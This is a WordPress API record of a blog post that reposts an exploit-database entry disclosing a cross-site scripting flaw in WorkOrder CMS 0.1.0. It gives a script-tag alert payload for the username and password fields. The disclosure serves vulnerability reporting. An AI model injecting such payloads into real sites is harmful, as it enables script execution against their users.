{"id":31019,"date":"2022-09-22T20:01:46","date_gmt":"2022-09-22T17:01:46","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168465\/workordercms010-xss.txt"},"modified":"2022-09-28T15:40:04","modified_gmt":"2022-09-28T12:10:04","slug":"workorder-cms-0-1-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/workorder-cms-0-1-0-cross-site-scripting\/","title":{"rendered":"WorkOrder CMS 0.1.0 Cross Site Scripting"},"content":{"rendered":"<pre dir=\"ltr\"><code># Exploit Title: WorkOrder CMS 0.1.0 Cross-Site Scripting (XSS)<\/code><\/pre>\n<p dir=\"ltr\"># Date: Sep 22, 2022<\/p>\n<p dir=\"ltr\"># Exploit Author: Chokri Hammedi<\/p>\n<p dir=\"ltr\"># Vendor Homepage: https:\/\/github.com\/romzes13\/WorkOrderCMS<\/p>\n<p dir=\"ltr\"># Software Link:<br \/>\nhttps:\/\/github.com\/romzes13\/WorkOrderCMS\/archive\/refs\/tags\/v0.1.0.zip<\/p>\n<p dir=\"ltr\"># Version: 0.1.0<\/p>\n<p dir=\"ltr\"># Tested on: Linux<\/p>\n<p dir=\"ltr\"># Payload:<\/p>\n<p dir=\"ltr\">username:&lt;u&gt;test1337&lt;script&gt;alert(&#8216;hi&#8217;);&lt;\/script&gt;<\/p>\n<p dir=\"ltr\">password:&lt;u&gt;test1337&lt;script&gt;alert(&#8216;hi&#8217;);&lt;\/script&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WorkOrder CMS 0.1.0 Cross-Site Scripting (XSS) # Date: Sep 22, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https:\/\/github.com\/romzes13\/WorkOrderCMS # Software Link: https:\/\/github.com\/romzes13\/WorkOrderCMS\/archive\/refs\/tags\/v0.1.0.zip # Version: 0.1.0 # Tested on: Linux # 
Payload: username:&lt;u&gt;test1337&lt;script&gt;alert(&#8216;hi&#8217;);&lt;\/script&gt; password:&lt;u&gt;test1337&lt;script&gt;alert(&#8216;hi&#8217;);&lt;\/script&gt;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-31019","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31019","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=31019"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31019\/revisions"}],"predecessor-version":[{"id":31313,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31019\/revisions\/31313"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=31019"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=31019"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=31019"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}